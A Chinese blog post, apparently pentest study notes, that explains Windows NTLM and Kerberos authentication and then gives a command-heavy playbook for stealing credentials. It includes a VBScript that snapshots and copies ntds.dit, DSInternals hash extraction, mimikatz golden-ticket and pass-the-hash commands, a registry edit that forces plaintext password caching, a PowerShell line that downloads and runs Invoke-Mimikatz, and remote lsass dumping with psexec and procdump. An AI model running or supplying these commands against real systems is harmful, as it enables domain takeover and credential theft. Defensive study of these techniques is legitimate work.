渗透测试之攻击Windows认证

最新推荐文章于 2023-05-09 10:05:00 发布
最新推荐文章于 2023-05-09 10:05:00 发布
阅读量519 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: windows 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Blood_Pupil/article/details/91440982
版权

Windows系统存在着两种主要认证方式,它们分别是NTLM和Kerbose

Windows认证机制

Hash存储位置

  • 本机用户:C:\Windows\system32\config\SAM (系统运行时不可访问)
  • 域用户:C:\Windows\NTDS\ntds.dit (系统运行时不可访问)

Widows的两种认证方式

认证方式应用场景类型参与者特点
NTLM主要用于Windows NT及Windows 2000 server及以后工作组环境中Challenge/Response based客户端,服务端,域控
Kerberos主要用于Windows 2000 server 及以后的域环境中Ticket based客户端,服务端,KDC(Key Distribution Center,一般由域控担任)无状态,双向认证

NTLM

LM只适用于小于14个字符的密码,如果大于14个字符则使用NTLM

2000xp2003Vistawin720082012
LM默认默认默认
NTLM大于14字符使用大于14字符使用大于14字符使用默认默认默认默认

当LM Hash是AAD3B435B51404EEAAD3B435B51404EE时有以下三种情况

  • 空密码
  • 大于十四位的密码
  • 故意设置为此值

NTLM认证过程如下所示:
NTLM

Kerberos

Kerberos是基于票据的认证方式,在这种认证方式下客户端想要访问某个服务时必须持有一张票据,但是这张票据不是随便领取的,在获得这张票据之前你首先得有一张认购权证。这种机制让我想起了现实中的一些例子,比如你要参加一个重要会议或者活动时你需要有门票吧,但是为了安全起见你必须首先去公安机关或者有关部门开一张你是良民的证明然后才能拿着这个证明买到参会的门票。Kerberos认证流程大体上可以分为六个步骤,如下图所示:
Kerberos图中一些缩写以及稍后将要用到的缩写的解释如下表所示:

缩写解释
KDCKey Distribution Center,秘钥分发中心,它包括AS及TGS两个服务
ASAuthentication Service,认证服务
TGSTicket Granting Service,票据授权服务
TGTTicket Granting Ticket,认购权证
ADAccount Database,账户数据库,用于存储用户名及对应的密码hash值,这个数据库一般由活动目录维护
STService Ticket,最终的服务票据
LSKLogon Session Key,客户端与KDC之间通信安全的会话秘钥
SSKService Session Key,客户端与服务器之间的通话秘钥

一些总结:

  • Authenticator在Kerberos认证过程中参与了每个环节,在上述1,3,5三个请求过程中它分别被客户端用户密码hash,LSK,SSK进行加密,其在认证过程中起到了标识客户端身份的重要作用。
  • LSK,SSK都是Short Term Key即这种秘钥可能频繁的更换所以就算在交互过程中泄露也不会影响太大,并且这两个秘钥每个都有两份。而用户密码,krbtgt用户密码,服务器密码则属于Long Term Key,因为我们通常不会频繁的变换自己的密码,这也是为什么会出现黄金票据及白银票据攻击方式的原因。
  • AD在上述认证的过程中也几乎参与了每个环节,需要通过它获得第一步中Username对应的密码从而生成加密Authenticator的秘钥从而对Client进行身份验证,还需要通过它获取KDC服务即krbtgt用户角色的密码由于加密TGT,最后还需要通过它获取Server Name对应的密码用于加密ST。
  • 6个步骤中涉及到的加密过程都是对称加密。这六个步骤可以进一步的分为三个子协议
子协议步骤
Authentication Service Exchange1(KRB_AS_REQ),2(KRB_AS_REP)
Authentication Service Exchange3(KRB_TGS_REQ),4(KRB_TGS_REP)
Client/Server Exchange5(KRB_AP_REQ),6(KRB_AP_REP)
  • Kerberos协议是双向认证的,在完成上述六个步骤后服务器会把步骤六中提取出来的Authenticator中的时间戳提取出来然后通过SSK加密传回给客户端客户端通过比较时间戳是否一致从而达到验证Server身份的目的。

Kerberos认证协议相对于NTLM来说安全性有了不少的提高,但是Kerberos还不是牢不可破的,常见的对于Kerberos的攻击方式如下表所示:

漏洞名称着力点权限限制
黄金票据KRBTGT角色的密码hash(上图第2步)Kerberos服务权限
白银票据Service 角色的密码hash(上图第5步)指定的服务访问权限在一个多域AD森林中,如果创建的Golden Ticket域不包含Enterprise Admins组,则Golden Ticket不会向林中的其他域提供管理权限。在单个域Active Directory林中,由于Enterprise Admins组驻留在此域中,这时创建Golden Ticket不存在局限性。

When?Which?

Windows下存在NTLM及Kerberos两种认证方式,那么问题来了具体什么时候用NTLM认证,什么时候用Kerberos认证?这个问题真的是困扰人找了半天也没找到准确的资料,只找到了下面这张表:

Local UserLocal SystemDomain UserDomain Machine
Local UserNTLMNTLMNTLMNTLM
Local SystemAnonymous NTLMAnonymous NTLMAnonymous NTLMAnonymous NTLM
Domain UserNTLMNTLMKerberosKerberos
Domain MachineNTLMNTLMKerberosKerberos

观察上表其实总结来说就是前面提到的NTLM用于工作组环境下的认证,而Kerberos用于域环境下的认证。

参考
Windows安全认证是如何进行的?[Kerberos篇]
谈谈基于Kerberos的Windows Network Authentication系列

攻击Windows认证

卷影拷贝服务及快照技术

在前面提到过SAM文件及NTDS.dit文件在开机状态下都是被锁定的不能直接访问,那么渗透测试环境下如何将这两个文件拿出来分析呢?既然有困难,那就肯定会有解决困难的方法,像Windows下提供的卷影拷贝(Volume Shadow Copy Service,VSS)、快照(snapshot)等用于文件备份及恢复的工具就可以为我们解决这个问题。既然SAM及NTDS.dit文件没办法直接访问,那么不如为其创建一个备份然后访问这些备份文件不也是一样吗?!所以像VSS等具有文件备份功能的工具就可以在我们离线分析SAM及NTDS.dit等文件时提供巨大的帮助。

域环境下

离线分析

域环境下在进行离线分析时需要导出ntds.dit及SYSTEM.hiv两个文件,SYSTEM.hiv导出方法如下:

reg  save hklm\system  system.hiv
导出ntds.dit
ntdsutil

通过ntdsutil获得导出ntds.dit,需要管理员权限,具体操作如下图:
ntdsutil非交互式自动化脚本如下所示:

set ws=wscript.createobject("wscript.shell")
set ret = ws.exec ("ntdsutil snapshot ""activate instance ntds"" create quit quit")
strText = ret.StdOut.ReadAll()
Set regEx = New RegExp
regEx.Pattern = "(\{[a-z0-9\-]*\})"
Set Mathces = regEx.Execute(strText)
For Each Match in Mathces 
     GUID = Match.value
Next
set ret = ws.exec ("ntdsutil snapshot ""mount "& GUID&""" quit quit")
strText = ret.StdOut.ReadAll()
regEx.Pattern = "([A-Z]:\\\$.*\$)"
Set Mathces = regEx.Execute(strText)
For Each Match in Mathces 
     MOUNT_POINT =  Match.value
Next
set so=createobject("scripting.filesystemobject")
so.getfile(MOUNT_POINT&"\windows\ntds\ntds.dit").copy("C:\ntds.dit") 
ws.run("ntdsutil snapshot ""unmount "&GUID&""" ""delete "&GUID&""" quit quit")
vss
方法1:vshadow

需要管理员权限
vshadow

方法2:vssown.vbs

需要管理员权限

cscript vssown.vbs /start
cscript vssown.vbs /create C
cscript vssown.vbs /list
copy (替换为Device Object的值)\windows\ntds\ntds.dit .
copy (替换为Device Object的值)\windows\system32\config\system .
cscript vssown.vbs /delete *

vssown

分析ntds.dit
QuarksPwDump.exe

quarkspwdump

DSInternals

Powershell版本:> = 3
以管理员身份运行

Import-Module .\DSInternals
Get-Module DSInternals
Get-Command DSInternals
$key = Get-BootKey -SystemHivePath 'C:\system.hiv'
Get-ADDBAccount -All -DBPath 'C:\ntds.dit' -BootKey $key | Out-File hash.txt
ntdsdump

ntdsdump

Impact/secretsdump.py

secretsdump.pyhash1

NTDSXtract + libesedb

配置过程
ntdsxtract

攻击手段

Pass The Ticket

得到client的密码hash

黄金票据
  • 得到krbtgt用户的密码NTLM hash

krbtgt_ntlm

  • 获得域名
    域名
  • 获得域管理员名
    域管理员
  • 获得域的SID
    域SID
    具体命令:
kerberos::golden  /admin:administrator  /domain:centoso.com  /sid:S-1-5-21-3085454607-3860466549-2764522924  /krbtgt:73556f2326c419362a3a6c79a07ef582 /ptt

golden_ticket

白银票据

得到服务器的密码hash

Skeleton Key

微软在2014年3月12日添加了LSA保护策略,用来防止对进程lsass.exe的代码注入,这样一来就无法使用mimikatz对lsass.exe进行注入,相关操作也会失败。

dcsync获取任意用户hash

需要域管理员权限上下文

单主机下

获取内存中的NTLM Hash

Windows 8.1 之后添加了安全机制阻止mimikatz通过WDigest provider提取明文密码,8.1之前的老版本可以通过安装KB2871997补丁来添加相应的安全机制。这个安全机制依赖于注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigestUseLogonCredential关键字的值:

  • 值为1时:允许将登陆密码明文存储在lsa内存中
  • 值为0时:禁止将登陆密码明文存储在lsa内存中

需要注意的是UseLogonCredential键在HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest 并不现显式存储,在Windows 8.1系统中此键默认值为0,而在打了相应补丁的老版本系统中此字段默认值为1,所以渗透测试过程如果由于此安全机制导致mimikatz抓不到明文密码则可通过下面的命令更改注册表的值(此值修改后只有用户在此登录时才会存储明文)来时系统存储明文密码:

线上分析
mimikatz
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

交互式抓取:

privilege::debug
sekurlsa::logonpasswords

将抓取结果存储在文件中:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > pssword.txt

通过Powershell调用Mimikatz:

PowerShell.exe -ExecutionPolicy Bypass -NoProfile -Noninteractive -c "IEX (New-object Net.webclient).DownloadString('http://127.0.0.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

powershell_mimikatz

Get-PassHashes.ps1

管理员权限运行
Get-PassHashes.psq

getpass
  • Windows2008 x64 执行失败
  • Windows2003 x86执行成功
    getpass
离线分析
sam

lsadump::sam SYSTEM.hiv SAM.hiv

ProcDump+Mimikatz

此方法在进行离线分析时需要分析平台与目标平台兼容
Procdump是一款dump进程内存的工具,其经常与Windbg联合使用用于分析程序bug,不过结合其与Mimikatz可以获取用户的登录凭证。具体思路是首先通过ProcDump获取lsass.exe的运行内存,lsass.exe用于本地安全和登陆策略,所以他的内存中存在用户的登录凭证信息,然后使用Mimikatz分析dump出的文件从而获取用户的凭证信息,具体操作流程如下:

psexec.exe \\10.0.0.3 -w C:\ -c C:\\ProcDump\procdump64.exe -accepteula -ma lsass.exe dump.dmp
copy \\10.0.0.3\C$\dump.dmp C:\lsass.dmp
Mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full"  exit > password.txt

procdump+mimikatz

攻击手法

WCE hash注入

hash注入攻击

PTH

sekurlsa::pth /user:Administrator /domain:test.local
/ntlm:cc36cf7a8514893efccd332446158b1a

各种票据攻击

总结

Mimikatz是Windows认证攻击中功能最为强大的工具,关于它的详细介绍可以参考这篇文章

未看

Blood_Pupil
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kerberos的概述和认证原理
qq_42456324的博客
12-16 1916
用来在非安全网络中,对个人通信以安全的手段进行身份认证。这个词又指麻省理工学院为这个协议开发的一套计算机软件。软件设计上采用客户端/服务器结构,并且能够进行相互认证,即客户端和服务器端均可对对方进行身份认证。可以用于防止窃听、防止重放攻击、保护数据完整性等场合,是一种。
关于JAVA程序的kerbose认证的一些事儿
KeithChen's的博客
12-01 1645
概况 我们这边用的是key + password 的 kerbose 认证. 在JAVA程序下也遇到一些关于 kerbose 认证绕不过的坑. 认证的代码 //认证返回一个UserGroupInformation,认证成功的User public static UserGroupInformation login(){ Configuration conf = new Co
关于Kerberos认证的一些攻击手法学习总结
渗透测试研究中心
05-09 1109
Kerberos认证流程前言本文主要分享最近学习的关于域内Kerberos认证的一些攻击手法,以自我的理解为主,从原理理解切入到基本工具利用来阐述,个人的理解分析较为啰嗦,嫌太兀长的可以跳着看就好,还请各位谅解。如有错误,请师傅们提出更正对于Kerberos认证流程只是简单的描述带过,下面有很多细节没有说明,比如PAC,S4U2SELF(委派),S4U2PROXY(委派)等。详细的解读推荐翻阅d...
Windows的Kerberos协议——Windows内网协议学习
Ping_Pig的博客
08-27 1744
目录 讲在前面: Kerberos协议概述 Kerberos认证流程 Kerberos协议产生的安全问题——之AS 用户名枚举 黄金票据 pass the hash 和pass the key(凭据传递攻击) Password Spraying(密码喷洒) AS-REPRoasting Kerberos协议产生的安全问题之——TGS Kerberos协议产生的安全问题之——PAC 讲在前面: 该文章不是以科普的形式书写,而是在学习前辈的基础上进行的自我笔记记录以及复习。 Kerb
Kerberos协议详解
热门推荐
做自己喜欢的事,并将其发挥到极致!
09-13 1万+
Kerberos协议是一个专注于验证通信双方身份的网络协议,不同于其他网络安全协议的保证整个通信过程的传输安全,Kerberos侧重于通信前双方身份的认定工作,帮助客户端以及服务端验证是真正的自己并非他人,从而使得通信两端能够完全信任对方的身份,在一个不安全的网络中完成一次安全的身份认证继而进行安全的通信。Kerberos是一种计算机网络认证协议,其设计目标是通过密钥系统为网络中通信的客户机(Client)/服务器(Server)应用程序提供严格的身份验证服务,确保通信双方身份的真实性和安全性。
渗透测试行业 网络安全 黑客术语
最新发布
03-02
渗透测试**:一种模拟真实攻击的测试方法,旨在评估系统的安全性。通过模拟黑客的行为和技术,发现并报告潜在的安全漏洞。 **2. 网络安全**:指确保网络及其资源处于良好状态,并能够提供可靠的服务,防止未经授权...
30 天渗透测试练习1.pdf
10-06
网络安全渗透测试是评估网络防御能力的一种方法,模拟黑客攻击行为以发现潜在漏洞。"30天渗透测试练习1.pdf" 提供了一个自我学习和实践的计划,旨在通过一系列的在线平台和虚拟环境来提升安全技能。这个计划没有特定...
渗透测试初学者资源 DVWA压缩包
12-23
渗透测试是网络安全领域中一项重要的技能,主要用于模拟黑客攻击,以评估系统安全防护能力。DVWA(Damn Vulnerable Web Application)是一款专为渗透测试初学者设计的开源Web应用,它包含了一系列常见安全漏洞,便于...
CISP-PTE渗透测试工程师知识体系大纲 (很全)
06-12
**CISP-PTE(注册信息安全专业人员-渗透测试工程师)**是中国信息安全测评中心推出的针对渗透测试领域的专业认证。该认证旨在培养具备扎实理论基础与实战经验的安全人才,以满足当前社会对网络安全防护的需求。 ###...
渗透测试培训介绍
07-26
渗透测试是网络安全领域中的一个重要环节,它是一种模拟黑客攻击行为,对系统、网络或应用程序进行安全评估的方法。目的是发现并修复潜在的安全漏洞,防止真正的恶意攻击。在这个“渗透测试培训介绍”的视频中,我们...
SharpSecDump:.Impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口
03-19
夏普转储 impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口。默认情况下,在当前用户的上下文中运行。请仅在您拥有或有权测试的环境中使用:) 用法 SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local 必需标志 -target-逗号分隔的要扫描的IP /主机名列表。请不要在地址之间包含空格。通过将target设置为127.0.0.1,还可以在本地系统上转储哈希。 可选标志 -u-要使用的用户名,如果要使用备用凭据来运行。必须与-p和-d标志一起使用 -p -明文密码才能使用,如果你想使用备用凭据运行。必须与-u和-d标志一起使用 -d-要使用的域(如果要使用备用凭据运行)(对于本地域)。必须与-u和-p标志一起使用 -threads-用于并发枚举多个
[内网渗透]—卷影拷贝提取ntds.dit
Sentiment的博客
12-08 898
ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括域中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当域上的任何用户,包括域管理员。在活动目录中,所有的数据都保存在ntds.dit中。
hadoop 添加kerberos认证
hua840812的专栏
03-21 3987
参考Cloudera官方文档:Configuring Hadoop Security in CDH3 一、部署无kerberos认证的Hadoop环境 参考另一篇笔记:hadoop集群部署 或者按照Cloudera的官方文档:CDH3 Installation Guide. 二、环境说明 1、主机名 之前部署hadoop集群时,没有使
kerberos 安装和配置
tonyhuang_google_com的专栏
04-06 1万+
kerberos 服务器端和客户端安装和配置
kerveros认证过程
guodongsz的专栏
05-19 577
摘自:http://zh.wikipedia.org/wiki/Kerberos
域渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7027
Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击。Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
Windows中的用户和组以及用户密码处理
墨鱼菜鸡
09-03 316
目录 用户帐户 Windows 默认账户 Windows内置用户账户 查看、创建和删除账户 组账户 内置组账户 组的查看、创建和删除 Windows中对用户密码的处理 LM-hash NTLM-hash 哈希传递攻击(Pass-the-Hash,PtH) MSF进行哈希传递攻击Pt...
windows 本地安全设置 灰色_window系统安全加固
weixin_39621488的博客
12-01 1618
windows 系统账号特性一般我们使用的普通的windows操作系统,对用户的密码是没有限制的,一般在家用版的windows中都会在一开始的时候给由你创建一个用户。而且对于家用的windows来说你的电脑不设置密码也是可以的。但是对于windows server来说,这是不行的。windows服务器对于账号和密码是有严格的要求的,而且windows服务器里面可能有很多的用户,因为每一...
9、Kerberos协议
安全学习笔记
07-23 4167
Kerberos协议 Kerberos
Web渗透测试入门:基础与安全风险
渗透测试中,理解这一架构有助于识别潜在攻击点,例如通过分析客户端和服务器之间的通信,找出不安全的接口或脆弱的认证机制。 此外,文档还暗示了后续内容可能涵盖Web应用程序的漏洞利用方法、测试工具的使用、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值